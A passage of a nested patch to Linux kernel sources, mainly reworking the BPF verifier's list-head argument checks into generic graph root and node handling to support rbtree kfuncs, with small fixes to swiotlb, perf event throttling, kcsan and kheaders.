++	case BPF_LIST_HEAD:
++		ret = is_bpf_list_api_kfunc(kfunc_btf_id);
++		break;
++	case BPF_RB_ROOT:
++		ret = is_bpf_rbtree_api_kfunc(kfunc_btf_id);
++		break;
++	default:
++		verbose(env, "verifier internal error: unexpected graph root argument type %s\n",
++			btf_field_type_name(head_field_type));
++		return false;
++	}
++
++	if (!ret)
++		verbose(env, "verifier internal error: %s head arg for unknown kfunc\n",
++			btf_field_type_name(head_field_type));
++	return ret;
++}
++
++static bool check_kfunc_is_graph_node_api(struct bpf_verifier_env *env,
++					  enum btf_field_type node_field_type,
++					  u32 kfunc_btf_id)
++{
++	bool ret;
++
++	switch (node_field_type) {
++	case BPF_LIST_NODE:
++		ret = (kfunc_btf_id == special_kfunc_list[KF_bpf_list_push_front] ||
++		       kfunc_btf_id == special_kfunc_list[KF_bpf_list_push_back]);
++		break;
++	case BPF_RB_NODE:
++		ret = (kfunc_btf_id == special_kfunc_list[KF_bpf_rbtree_remove] ||
++		       kfunc_btf_id == special_kfunc_list[KF_bpf_rbtree_add]);
++		break;
++	default:
++		verbose(env, "verifier internal error: unexpected graph node argument type %s\n",
++			btf_field_type_name(node_field_type));
++		return false;
++	}
++
++	if (!ret)
++		verbose(env, "verifier internal error: %s node arg for unknown kfunc\n",
++			btf_field_type_name(node_field_type));
++	return ret;
++}
++
++static int
++__process_kf_arg_ptr_to_graph_root(struct bpf_verifier_env *env,
++				   struct bpf_reg_state *reg, u32 regno,
++				   struct bpf_kfunc_call_arg_meta *meta,
++				   enum btf_field_type head_field_type,
++				   struct btf_field **head_field)
++{
++	const char *head_type_name;
+ 	struct btf_field *field;
+ 	struct btf_record *rec;
+-	u32 list_head_off;
++	u32 head_off;
+ 
+-	if (meta->btf != btf_vmlinux || !is_bpf_list_api_kfunc(meta->func_id)) {
+-		verbose(env, "verifier internal error: bpf_list_head argument for unknown kfunc\n");
++	if (meta->btf != btf_vmlinux) {
++		verbose(env, "verifier internal error: unexpected btf mismatch in kfunc call\n");
+ 		return -EFAULT;
+ 	}
+ 
++	if (!check_kfunc_is_graph_root_api(env, head_field_type, meta->func_id))
++		return -EFAULT;
++
++	head_type_name = btf_field_type_name(head_field_type);
+ 	if (!tnum_is_const(reg->var_off)) {
+ 		verbose(env,
+-			"R%d doesn't have constant offset. bpf_list_head has to be at the constant offset\n",
+-			regno);
++			"R%d doesn't have constant offset. %s has to be at the constant offset\n",
++			regno, head_type_name);
+ 		return -EINVAL;
+ 	}
+ 
+ 	rec = reg_btf_record(reg);
+-	list_head_off = reg->off + reg->var_off.value;
+-	field = btf_record_find(rec, list_head_off, BPF_LIST_HEAD);
++	head_off = reg->off + reg->var_off.value;
++	field = btf_record_find(rec, head_off, head_field_type);
+ 	if (!field) {
+-		verbose(env, "bpf_list_head not found at offset=%u\n", list_head_off);
++		verbose(env, "%s not found at offset=%u\n", head_type_name, head_off);
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* All functions require bpf_list_head to be protected using a bpf_spin_lock */
+ 	if (check_reg_allocation_locked(env, reg)) {
+-		verbose(env, "bpf_spin_lock at off=%d must be held for bpf_list_head\n",
+-			rec->spin_lock_off);
++		verbose(env, "bpf_spin_lock at off=%d must be held for %s\n",
++			rec->spin_lock_off, head_type_name);
+ 		return -EINVAL;
+ 	}
+ 
+-	if (meta->arg_list_head.field) {
+-		verbose(env, "verifier internal error: repeating bpf_list_head arg\n");
++	if (*head_field) {
++		verbose(env, "verifier internal error: repeating %s arg\n", head_type_name);
+ 		return -EFAULT;
+ 	}
+-	meta->arg_list_head.field = field;
++	*head_field = field;
+ 	return 0;
+ }
+ 
+-static int process_kf_arg_ptr_to_list_node(struct bpf_verifier_env *env,
++static int process_kf_arg_ptr_to_list_head(struct bpf_verifier_env *env,
+ 					   struct bpf_reg_state *reg, u32 regno,
+ 					   struct bpf_kfunc_call_arg_meta *meta)
+ {
++	return __process_kf_arg_ptr_to_graph_root(env, reg, regno, meta, BPF_LIST_HEAD,
++							  &meta->arg_list_head.field);
++}
++
++static int process_kf_arg_ptr_to_rbtree_root(struct bpf_verifier_env *env,
++					     struct bpf_reg_state *reg, u32 regno,
++					     struct bpf_kfunc_call_arg_meta *meta)
++{
++	return __process_kf_arg_ptr_to_graph_root(env, reg, regno, meta, BPF_RB_ROOT,
++							  &meta->arg_rbtree_root.field);
++}
++
++static int
++__process_kf_arg_ptr_to_graph_node(struct bpf_verifier_env *env,
++				   struct bpf_reg_state *reg, u32 regno,
++				   struct bpf_kfunc_call_arg_meta *meta,
++				   enum btf_field_type head_field_type,
++				   enum btf_field_type node_field_type,
++				   struct btf_field **node_field)
++{
++	const char *node_type_name;
+ 	const struct btf_type *et, *t;
+ 	struct btf_field *field;
+-	struct btf_record *rec;
+-	u32 list_node_off;
++	u32 node_off;
+ 
+-	if (meta->btf != btf_vmlinux ||
+-	    (meta->func_id != special_kfunc_list[KF_bpf_list_push_front] &&
+-	     meta->func_id != special_kfunc_list[KF_bpf_list_push_back])) {
+-		verbose(env, "verifier internal error: bpf_list_node argument for unknown kfunc\n");
++	if (meta->btf != btf_vmlinux) {
++		verbose(env, "verifier internal error: unexpected btf mismatch in kfunc call\n");
+ 		return -EFAULT;
+ 	}
+ 
++	if (!check_kfunc_is_graph_node_api(env, node_field_type, meta->func_id))
++		return -EFAULT;
++
++	node_type_name = btf_field_type_name(node_field_type);
+ 	if (!tnum_is_const(reg->var_off)) {
+ 		verbose(env,
+-			"R%d doesn't have constant offset. bpf_list_node has to be at the constant offset\n",
+-			regno);
++			"R%d doesn't have constant offset. %s has to be at the constant offset\n",
++			regno, node_type_name);
+ 		return -EINVAL;
+ 	}
+ 
+-	rec = reg_btf_record(reg);
+-	list_node_off = reg->off + reg->var_off.value;
+-	field = btf_record_find(rec, list_node_off, BPF_LIST_NODE);
+-	if (!field || field->offset != list_node_off) {
+-		verbose(env, "bpf_list_node not found at offset=%u\n", list_node_off);
++	node_off = reg->off + reg->var_off.value;
++	field = reg_find_field_offset(reg, node_off, node_field_type);
++	if (!field || field->offset != node_off) {
++		verbose(env, "%s not found at offset=%u\n", node_type_name, node_off);
+ 		return -EINVAL;
+ 	}
+ 
+-	field = meta->arg_list_head.field;
++	field = *node_field;
+ 
+-	et = btf_type_by_id(field->list_head.btf, field->list_head.value_btf_id);
++	et = btf_type_by_id(field->graph_root.btf, field->graph_root.value_btf_id);
+ 	t = btf_type_by_id(reg->btf, reg->btf_id);
+-	if (!btf_struct_ids_match(&env->log, reg->btf, reg->btf_id, 0, field->list_head.btf,
+-				  field->list_head.value_btf_id, true)) {
+-		verbose(env, "operation on bpf_list_head expects arg#1 bpf_list_node at offset=%d "
++	if (!btf_struct_ids_match(&env->log, reg->btf, reg->btf_id, 0, field->graph_root.btf,
++				  field->graph_root.value_btf_id, true)) {
++		verbose(env, "operation on %s expects arg#1 %s at offset=%d "
+ 			"in struct %s, but arg is at offset=%d in struct %s\n",
+-			field->list_head.node_offset, btf_name_by_offset(field->list_head.btf, et->name_off),
+-			list_node_off, btf_name_by_offset(reg->btf, t->name_off));
++			btf_field_type_name(head_field_type),
++			btf_field_type_name(node_field_type),
++			field->graph_root.node_offset,
++			btf_name_by_offset(field->graph_root.btf, et->name_off),
++			node_off, btf_name_by_offset(reg->btf, t->name_off));
+ 		return -EINVAL;
+ 	}
+ 
+-	if (list_node_off != field->list_head.node_offset) {
+-		verbose(env, "arg#1 offset=%d, but expected bpf_list_node at offset=%d in struct %s\n",
+-			list_node_off, field->list_head.node_offset,
+-			btf_name_by_offset(field->list_head.btf, et->name_off));
++	if (node_off != field->graph_root.node_offset) {
++		verbose(env, "arg#1 offset=%d, but expected %s at offset=%d in struct %s\n",
++			node_off, btf_field_type_name(node_field_type),
++			field->graph_root.node_offset,
++			btf_name_by_offset(field->graph_root.btf, et->name_off));
+ 		return -EINVAL;
+ 	}
+-	/* Set arg#1 for expiration after unlock */
+-	return ref_set_release_on_unlock(env, reg->ref_obj_id);
++
++	return 0;
++}
++
++static int process_kf_arg_ptr_to_list_node(struct bpf_verifier_env *env,
++					   struct bpf_reg_state *reg, u32 regno,
++					   struct bpf_kfunc_call_arg_meta *meta)
++{
++	return __process_kf_arg_ptr_to_graph_node(env, reg, regno, meta,
++						  BPF_LIST_HEAD, BPF_LIST_NODE,
++						  &meta->arg_list_head.field);
++}
++
++static int process_kf_arg_ptr_to_rbtree_node(struct bpf_verifier_env *env,
++					     struct bpf_reg_state *reg, u32 regno,
++					     struct bpf_kfunc_call_arg_meta *meta)
++{
++	return __process_kf_arg_ptr_to_graph_node(env, reg, regno, meta,
++						  BPF_RB_ROOT, BPF_RB_NODE,
++						  &meta->arg_rbtree_root.field);
+ }
+ 
+ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_arg_meta *meta)
+@@ -9150,8 +9456,11 @@ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_
+ 		case KF_ARG_PTR_TO_DYNPTR:
+ 		case KF_ARG_PTR_TO_LIST_HEAD:
+ 		case KF_ARG_PTR_TO_LIST_NODE:
++		case KF_ARG_PTR_TO_RB_ROOT:
++		case KF_ARG_PTR_TO_RB_NODE:
+ 		case KF_ARG_PTR_TO_MEM:
+ 		case KF_ARG_PTR_TO_MEM_SIZE:
++		case KF_ARG_PTR_TO_CALLBACK:
+ 			/* Trusted by default */
+ 			break;
+ 		default:
+@@ -9228,6 +9537,20 @@ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_
+ 			if (ret < 0)
+ 				return ret;
+ 			break;
++		case KF_ARG_PTR_TO_RB_ROOT:
++			if (reg->type != PTR_TO_MAP_VALUE &&
++			    reg->type != (PTR_TO_BTF_ID | MEM_ALLOC)) {
++				verbose(env, "arg#%d expected pointer to map value or allocated object\n", i);
++				return -EINVAL;
++			}
++			if (reg->type == (PTR_TO_BTF_ID | MEM_ALLOC) && !reg->ref_obj_id) {
++				verbose(env, "allocated object must be referenced\n");
++				return -EINVAL;
++			}
++			ret = process_kf_arg_ptr_to_rbtree_root(env, reg, regno, meta);
++			if (ret < 0)
++				return ret;
++			break;
+ 		case KF_ARG_PTR_TO_LIST_NODE:
+ 			if (reg->type != (PTR_TO_BTF_ID | MEM_ALLOC)) {
+ 				verbose(env, "arg#%d expected pointer to allocated object\n", i);
+@@ -9241,6 +9564,19 @@ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_
+ 			if (ret < 0)
+ 				return ret;
+ 			break;
++		case KF_ARG_PTR_TO_RB_NODE:
++			if (reg->type != (PTR_TO_BTF_ID | MEM_ALLOC)) {
++				verbose(env, "arg#%d expected pointer to allocated object\n", i);
++				return -EINVAL;
++			}
++			if (!reg->ref_obj_id) {
++				verbose(env, "allocated object must be referenced\n");
++				return -EINVAL;
++			}
++			ret = process_kf_arg_ptr_to_rbtree_node(env, reg, regno, meta);
++			if (ret < 0)
++				return ret;
++			break;
+ 		case KF_ARG_PTR_TO_BTF_ID:
+ 			/* Only base_type is checked, further checks are done here */
+ 			if ((base_type(reg->type) != PTR_TO_BTF_ID ||
+@@ -9276,6 +9612,9 @@ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_
+ 			/* Skip next '__sz' argument */
+ 			i++;
+ 			break;
++		case KF_ARG_PTR_TO_CALLBACK:
++			meta->subprogno = reg->subprogno;
++			break;
+ 		}
+ 	}
+ 
+@@ -9288,24 +9627,21 @@ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_
+ 	return 0;
+ }
+ 
+-static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+-			    int *insn_idx_p)
++static int fetch_kfunc_meta(struct bpf_verifier_env *env,
++			    struct bpf_insn *insn,
++			    struct bpf_kfunc_call_arg_meta *meta,
++			    const char **kfunc_name)
+ {
+-	const struct btf_type *t, *func, *func_proto, *ptr_type;
+-	struct bpf_reg_state *regs = cur_regs(env);
+-	const char *func_name, *ptr_type_name;
+-	bool sleepable, rcu_lock, rcu_unlock;
+-	struct bpf_kfunc_call_arg_meta meta;
+-	u32 i, nargs, func_id, ptr_type_id;
+-	int err, insn_idx = *insn_idx_p;
+-	const struct btf_param *args;
+-	const struct btf_type *ret_t;
++	const struct btf_type *func, *func_proto;
++	u32 func_id, *kfunc_flags;
++	const char *func_name;
+ 	struct btf *desc_btf;
+-	u32 *kfunc_flags;
+ 
+-	/* skip for now, but return error when we find this in fixup_kfunc_call */
++	if (kfunc_name)
++		*kfunc_name = NULL;
++
+ 	if (!insn->imm)
+-		return 0;
++		return -EINVAL;
+ 
+ 	desc_btf = find_kfunc_desc_btf(env, insn->off);
+ 	if (IS_ERR(desc_btf))
+@@ -9314,22 +9650,51 @@ static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 	func_id = insn->imm;
+ 	func = btf_type_by_id(desc_btf, func_id);
+ 	func_name = btf_name_by_offset(desc_btf, func->name_off);
++	if (kfunc_name)
++		*kfunc_name = func_name;
+ 	func_proto = btf_type_by_id(desc_btf, func->type);
+ 
+ 	kfunc_flags = btf_kfunc_id_set_contains(desc_btf, resolve_prog_type(env->prog), func_id);
+ 	if (!kfunc_flags) {
+-		verbose(env, "calling kernel function %s is not allowed\n",
+-			func_name);
+ 		return -EACCES;
+ 	}
+ 
+-	/* Prepare kfunc call metadata */
+-	memset(&meta, 0, sizeof(meta));
+-	meta.btf = desc_btf;
+-	meta.func_id = func_id;
+-	meta.kfunc_flags = *kfunc_flags;
+-	meta.func_proto = func_proto;
+-	meta.func_name = func_name;
++	memset(meta, 0, sizeof(*meta));
++	meta->btf = desc_btf;
++	meta->func_id = func_id;
++	meta->kfunc_flags = *kfunc_flags;
++	meta->func_proto = func_proto;
++	meta->func_name = func_name;
++
++	return 0;
++}
++
++static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
++			    int *insn_idx_p)
++{
++	const struct btf_type *t, *ptr_type;
++	u32 i, nargs, ptr_type_id, release_ref_obj_id;
++	struct bpf_reg_state *regs = cur_regs(env);
++	const char *func_name, *ptr_type_name;
++	bool sleepable, rcu_lock, rcu_unlock;
++	struct bpf_kfunc_call_arg_meta meta;
++	struct bpf_insn_aux_data *insn_aux;
++	int err, insn_idx = *insn_idx_p;
++	const struct btf_param *args;
++	const struct btf_type *ret_t;
++	struct btf *desc_btf;
++
++	/* skip for now, but return error when we find this in fixup_kfunc_call */
++	if (!insn->imm)
++		return 0;
++
++	err = fetch_kfunc_meta(env, insn, &meta, &func_name);
++	if (err == -EACCES && func_name)
++		verbose(env, "calling kernel function %s is not allowed\n", func_name);
++	if (err)
++		return err;
++	desc_btf = meta.btf;
++	insn_aux = &env->insn_aux_data[insn_idx];
+ 
+ 	if (is_kfunc_destructive(&meta) && !capable(CAP_SYS_BOOT)) {
+ 		verbose(env, "destructive kfunc calls require CAP_SYS_BOOT capability\n");
+@@ -9386,7 +9751,36 @@ static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 		err = release_reference(env, regs[meta.release_regno].ref_obj_id);
+ 		if (err) {
+ 			verbose(env, "kfunc %s#%d reference has not been acquired before\n",
+-				func_name, func_id);
++				func_name, meta.func_id);
++			return err;
++		}
++	}
++
++	if (meta.func_id == special_kfunc_list[KF_bpf_list_push_front] ||
++	    meta.func_id == special_kfunc_list[KF_bpf_list_push_back] ||
++	    meta.func_id == special_kfunc_list[KF_bpf_rbtree_add]) {
++		release_ref_obj_id = regs[BPF_REG_2].ref_obj_id;
++		err = ref_convert_owning_non_owning(env, release_ref_obj_id);
++		if (err) {
++			verbose(env, "kfunc %s#%d conversion of owning ref to non-owning failed\n",
++				func_name, meta.func_id);
++			return err;
++		}
++
++		err = release_reference(env, release_ref_obj_id);
++		if (err) {
++			verbose(env, "kfunc %s#%d reference has not been acquired before\n",
++				func_name, meta.func_id);
++			return err;
++		}
++	}
++
++	if (meta.func_id == special_kfunc_list[KF_bpf_rbtree_add]) {
++		err = __check_func_call(env, insn, insn_idx_p, meta.subprogno,
++					set_rbtree_add_callback_state);
++		if (err) {
++			verbose(env, "kfunc %s#%d failed callback verification\n",
++				func_name, meta.func_id);
+ 			return err;
+ 		}
+ 	}
+@@ -9395,7 +9789,7 @@ static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 		mark_reg_not_init(env, regs, caller_saved[i]);
+ 
+ 	/* Check return type */
+-	t = btf_type_skip_modifiers(desc_btf, func_proto->type, NULL);
++	t = btf_type_skip_modifiers(desc_btf, meta.func_proto->type, NULL);
+ 
+ 	if (is_kfunc_acquire(&meta) && !btf_type_is_struct_ptr(meta.btf, t)) {
+ 		/* Only exception is bpf_obj_new_impl */
+@@ -9444,22 +9838,18 @@ static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 				regs[BPF_REG_0].btf = ret_btf;
+ 				regs[BPF_REG_0].btf_id = ret_btf_id;
+ 
+-				env->insn_aux_data[insn_idx].obj_new_size = ret_t->size;
+-				env->insn_aux_data[insn_idx].kptr_struct_meta =
++				insn_aux->obj_new_size = ret_t->size;
++				insn_aux->kptr_struct_meta =
+ 					btf_find_struct_meta(ret_btf, ret_btf_id);
+-			} else if (meta.func_id == special_kfunc_list[KF_bpf_obj_drop_impl]) {
+-				env->insn_aux_data[insn_idx].kptr_struct_meta =
+-					btf_find_struct_meta(meta.arg_obj_drop.btf,
+-							     meta.arg_obj_drop.btf_id);
+ 			} else if (meta.func_id == special_kfunc_list[KF_bpf_list_pop_front] ||
+ 				   meta.func_id == special_kfunc_list[KF_bpf_list_pop_back]) {
+ 				struct btf_field *field = meta.arg_list_head.field;
+ 
+ 				mark_reg_known_zero(env, regs, BPF_REG_0);
+ 				regs[BPF_REG_0].type = PTR_TO_BTF_ID | MEM_ALLOC;
+-				regs[BPF_REG_0].btf = field->list_head.btf;
+-				regs[BPF_REG_0].btf_id = field->list_head.value_btf_id;
+-				regs[BPF_REG_0].off = field->list_head.node_offset;
++				regs[BPF_REG_0].btf = field->graph_root.btf;
++				regs[BPF_REG_0].btf_id = field->graph_root.value_btf_id;
++				regs[BPF_REG_0].off = field->graph_root.node_offset;
+ 			} else if (meta.func_id == special_kfunc_list[KF_bpf_cast_to_kern_ctx]) {
+ 				mark_reg_known_zero(env, regs, BPF_REG_0);
+ 				regs[BPF_REG_0].type = PTR_TO_BTF_ID | PTR_TRUSTED;
+@@ -9528,10 +9918,18 @@ static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 		}
+ 		if (reg_may_point_to_spin_lock(&regs[BPF_REG_0]) && !regs[BPF_REG_0].id)
+ 			regs[BPF_REG_0].id = ++env->id_gen;
+-	} /* else { add_kfunc_call() ensures it is btf_type_is_void(t) } */
++	} else if (btf_type_is_void(t)) {
++		if (meta.btf == btf_vmlinux && btf_id_set_contains(&special_kfunc_set, meta.func_id)) {
++			if (meta.func_id == special_kfunc_list[KF_bpf_obj_drop_impl]) {
++				insn_aux->kptr_struct_meta =
++					btf_find_struct_meta(meta.arg_obj_drop.btf,
++							     meta.arg_obj_drop.btf_id);
++			}
++		}
++	}
+ 
+-	nargs = btf_type_vlen(func_proto);
+-	args = (const struct btf_param *)(func_proto + 1);
++	nargs = btf_type_vlen(meta.func_proto);
++	args = (const struct btf_param *)(meta.func_proto + 1);
+ 	for (i = 0; i < nargs; i++) {
+ 		u32 regno = i + 1;
+ 
+@@ -11711,8 +12109,10 @@ static void mark_ptr_or_null_reg(struct bpf_func_state *state,
+ 		 */
+ 		if (WARN_ON_ONCE(reg->smin_value || reg->smax_value || !tnum_equals_const(reg->var_off, 0)))
+ 			return;
+-		if (reg->type != (PTR_TO_BTF_ID | MEM_ALLOC | PTR_MAYBE_NULL) && WARN_ON_ONCE(reg->off))
++		if (!(type_is_ptr_alloc_obj(reg->type) || type_is_non_owning_ref(reg->type)) &&
++		    WARN_ON_ONCE(reg->off))
+ 			return;
++
+ 		if (is_null) {
+ 			reg->type = SCALAR_VALUE;
+ 			/* We don't need id and ref_obj_id from this point
+@@ -13674,10 +14074,11 @@ static int propagate_precision(struct bpf_verifier_env *env,
+ 		state_reg = state->regs;
+ 		for (i = 0; i < BPF_REG_FP; i++, state_reg++) {
+ 			if (state_reg->type != SCALAR_VALUE ||
+-			    !state_reg->precise)
++			    !state_reg->precise ||
++			    !(state_reg->live & REG_LIVE_READ))
+ 				continue;
+ 			if (env->log.level & BPF_LOG_LEVEL2)
+-				verbose(env, "frame %d: propagating r%d\n", i, fr);
++				verbose(env, "frame %d: propagating r%d\n", fr, i);
+ 			err = mark_chain_precision_frame(env, fr, i);
+ 			if (err < 0)
+ 				return err;
+@@ -13688,11 +14089,12 @@ static int propagate_precision(struct bpf_verifier_env *env,
+ 				continue;
+ 			state_reg = &state->stack[i].spilled_ptr;
+ 			if (state_reg->type != SCALAR_VALUE ||
+-			    !state_reg->precise)
++			    !state_reg->precise ||
++			    !(state_reg->live & REG_LIVE_READ))
+ 				continue;
+ 			if (env->log.level & BPF_LOG_LEVEL2)
+ 				verbose(env, "frame %d: propagating fp%d\n",
+-					(-i - 1) * BPF_REG_SIZE, fr);
++					fr, (-i - 1) * BPF_REG_SIZE);
+ 			err = mark_chain_precision_stack_frame(env, fr, i);
+ 			if (err < 0)
+ 				return err;
+@@ -14216,7 +14618,7 @@ static int do_check(struct bpf_verifier_env *env)
+ 					if ((insn->src_reg == BPF_REG_0 && insn->imm != BPF_FUNC_spin_unlock) ||
+ 					    (insn->src_reg == BPF_PSEUDO_CALL) ||
+ 					    (insn->src_reg == BPF_PSEUDO_KFUNC_CALL &&
+-					     (insn->off != 0 || !is_bpf_list_api_kfunc(insn->imm)))) {
++					     (insn->off != 0 || !is_bpf_graph_api_kfunc(insn->imm)))) {
+ 						verbose(env, "function calls are not allowed while holding a lock\n");
+ 						return -EINVAL;
+ 					}
+@@ -14252,7 +14654,8 @@ static int do_check(struct bpf_verifier_env *env)
+ 					return -EINVAL;
+ 				}
+ 
+-				if (env->cur_state->active_lock.ptr) {
++				if (env->cur_state->active_lock.ptr &&
++				    !in_rbtree_lock_required_cb(env)) {
+ 					verbose(env, "bpf_spin_unlock is missing\n");
+ 					return -EINVAL;
+ 				}
+@@ -14514,9 +14917,10 @@ static int check_map_prog_compatibility(struct bpf_verifier_env *env,
+ {
+ 	enum bpf_prog_type prog_type = resolve_prog_type(prog);
+ 
+-	if (btf_record_has_field(map->record, BPF_LIST_HEAD)) {
++	if (btf_record_has_field(map->record, BPF_LIST_HEAD) ||
++	    btf_record_has_field(map->record, BPF_RB_ROOT)) {
+ 		if (is_tracing_prog_type(prog_type)) {
+-			verbose(env, "tracing progs cannot use bpf_list_head yet\n");
++			verbose(env, "tracing progs cannot use bpf_{list_head,rb_root} yet\n");
+ 			return -EINVAL;
+ 		}
+ 	}
+@@ -16115,21 +16519,21 @@ static int do_misc_fixups(struct bpf_verifier_env *env)
+ 			BUILD_BUG_ON(!__same_type(ops->map_lookup_elem,
+ 				     (void *(*)(struct bpf_map *map, void *key))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_delete_elem,
+-				     (int (*)(struct bpf_map *map, void *key))NULL));
++				     (long (*)(struct bpf_map *map, void *key))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_update_elem,
+-				     (int (*)(struct bpf_map *map, void *key, void *value,
++				     (long (*)(struct bpf_map *map, void *key, void *value,
+ 					      u64 flags))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_push_elem,
+-				     (int (*)(struct bpf_map *map, void *value,
++				     (long (*)(struct bpf_map *map, void *value,
+ 					      u64 flags))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_pop_elem,
+-				     (int (*)(struct bpf_map *map, void *value))NULL));
++				     (long (*)(struct bpf_map *map, void *value))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_peek_elem,
+-				     (int (*)(struct bpf_map *map, void *value))NULL));
++				     (long (*)(struct bpf_map *map, void *value))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_redirect,
+-				     (int (*)(struct bpf_map *map, u64 index, u64 flags))NULL));
++				     (long (*)(struct bpf_map *map, u64 index, u64 flags))NULL));
+ 			BUILD_BUG_ON(!__same_type(ops->map_for_each_callback,
+-				     (int (*)(struct bpf_map *map,
++				     (long (*)(struct bpf_map *map,
+ 					      bpf_callback_t callback_fn,
+ 					      void *callback_ctx,
+ 					      u64 flags))NULL));
+diff --git a/kernel/dma/swiotlb.c b/kernel/dma/swiotlb.c
+index ef3bc3a5bbed3..81f40821084ec 100644
+--- a/kernel/dma/swiotlb.c
++++ b/kernel/dma/swiotlb.c
+@@ -935,7 +935,9 @@ EXPORT_SYMBOL_GPL(is_swiotlb_active);
+ 
+ static int io_tlb_used_get(void *data, u64 *val)
+ {
+-	*val = mem_used(&io_tlb_default_mem);
++	struct io_tlb_mem *mem = data;
++
++	*val = mem_used(mem);
+ 	return 0;
+ }
+ DEFINE_DEBUGFS_ATTRIBUTE(fops_io_tlb_used, io_tlb_used_get, NULL, "%llu\n");
+@@ -948,7 +950,7 @@ static void swiotlb_create_debugfs_files(struct io_tlb_mem *mem,
+ 		return;
+ 
+ 	debugfs_create_ulong("io_tlb_nslabs", 0400, mem->debugfs, &mem->nslabs);
+-	debugfs_create_file("io_tlb_used", 0400, mem->debugfs, NULL,
++	debugfs_create_file("io_tlb_used", 0400, mem->debugfs, mem,
+ 			&fops_io_tlb_used);
+ }
+ 
+@@ -1003,6 +1005,11 @@ static int rmem_swiotlb_device_init(struct reserved_mem *rmem,
+ 	/* Set Per-device io tlb area to one */
+ 	unsigned int nareas = 1;
+ 
++	if (PageHighMem(pfn_to_page(PHYS_PFN(rmem->base)))) {
++		dev_err(dev, "Restricted DMA pool must be accessible within the linear mapping.");
++		return -EINVAL;
++	}
++
+ 	/*
+ 	 * Since multiple devices can share the same pool, the private data,
+ 	 * io_tlb_mem struct, will be initialized by the first device attached
+@@ -1064,11 +1071,6 @@ static int __init rmem_swiotlb_setup(struct reserved_mem *rmem)
+ 	    of_get_flat_dt_prop(node, "no-map", NULL))
+ 		return -EINVAL;
+ 
+-	if (PageHighMem(pfn_to_page(PHYS_PFN(rmem->base)))) {
+-		pr_err("Restricted DMA pool must be accessible within the linear mapping.");
+-		return -EINVAL;
+-	}
+-
+ 	rmem->ops = &rmem_swiotlb_ops;
+ 	pr_info("Reserved memory: created restricted DMA pool at %pa, size %ld MiB\n",
+ 		&rmem->base, (unsigned long)rmem->size / SZ_1M);
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index daecb8c9126b0..2290d67ade41d 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -9408,8 +9408,8 @@ __perf_event_account_interrupt(struct perf_event *event, int throttle)
+ 		hwc->interrupts = 1;
+ 	} else {
+ 		hwc->interrupts++;
+-		if (unlikely(throttle
+-			     && hwc->interrupts >= max_samples_per_tick)) {
++		if (unlikely(throttle &&
++			     hwc->interrupts > max_samples_per_tick)) {
+ 			__this_cpu_inc(perf_throttled_count);
+ 			tick_dep_set_cpu(smp_processor_id(), TICK_DEP_BIT_PERF_EVENTS);
+ 			hwc->interrupts = MAX_INTERRUPTS;
+diff --git a/kernel/kcsan/core.c b/kernel/kcsan/core.c
+index 54d077e1a2dc7..5a60cc52adc0c 100644
+--- a/kernel/kcsan/core.c
++++ b/kernel/kcsan/core.c
+@@ -337,11 +337,20 @@ static void delay_access(int type)
+  */
+ static __always_inline u64 read_instrumented_memory(const volatile void *ptr, size_t size)
+ {
++	/*
++	 * In the below we don't necessarily need the read of the location to
++	 * be atomic, and we don't use READ_ONCE(), since all we need for race
++	 * detection is to observe 2 different values.
++	 *
++	 * Furthermore, on certain architectures (such as arm64), READ_ONCE()
++	 * may turn into more complex instructions than a plain load that cannot
++	 * do unaligned accesses.
++	 */
+ 	switch (size) {
+-	case 1:  return READ_ONCE(*(const u8 *)ptr);
+-	case 2:  return READ_ONCE(*(const u16 *)ptr);
+-	case 4:  return READ_ONCE(*(const u32 *)ptr);
+-	case 8:  return READ_ONCE(*(const u64 *)ptr);
++	case 1:  return *(const volatile u8 *)ptr;
++	case 2:  return *(const volatile u16 *)ptr;
++	case 4:  return *(const volatile u32 *)ptr;
++	case 8:  return *(const volatile u64 *)ptr;
+ 	default: return 0; /* Ignore; we do not diff the values. */
+ 	}
+ }
+diff --git a/kernel/kheaders.c b/kernel/kheaders.c
+index 8f69772af77b4..42163c9e94e55 100644
+--- a/kernel/kheaders.c
++++ b/kernel/kheaders.c
+@@ -26,15 +26,15 @@ asm (
+ "	.popsection				\n"
+ );
+ 
+-extern char kernel_headers_data;
+-extern char kernel_headers_data_end;
++extern char kernel_headers_data[];
++extern char kernel_headers_data_end[];
+ 
+ static ssize_t
+ ikheaders_read(struct file *file,  struct kobject *kobj,
+ 	       struct bin_attribute *bin_attr,
+ 	       char *buf, loff_t off, size_t len)
+ {
+-	memcpy(buf, &kernel_headers_data + off, len);
++	memcpy(buf, &kernel_headers_data[off], len);
+ 	return len;
+ }
+ 
+@@ -48,8 +48,8 @@ static struct bin_attribute kheaders_attr __ro_after_init = {
+ 
+ static int __init ikheaders_init(void)
+ {
+-	kheaders_attr.size = (&kernel_headers_data_end -
+-			      &kernel_headers_data);
++	kheaders_attr.size = (kernel_headers_data_end -
++			      kernel_headers_data);
+ 	return sysfs_create_bin_file(kernel_kobj, &kheaders_attr);
+ }
+ 
+diff --git a/kernel/module/decompress.c b/kernel/module/decompress.c
+index bb79ac1a6d8f7..7ddc87bee2741 100644
+--- a/kernel/module/decompress.c
++++ b/kernel/module/decompress.c
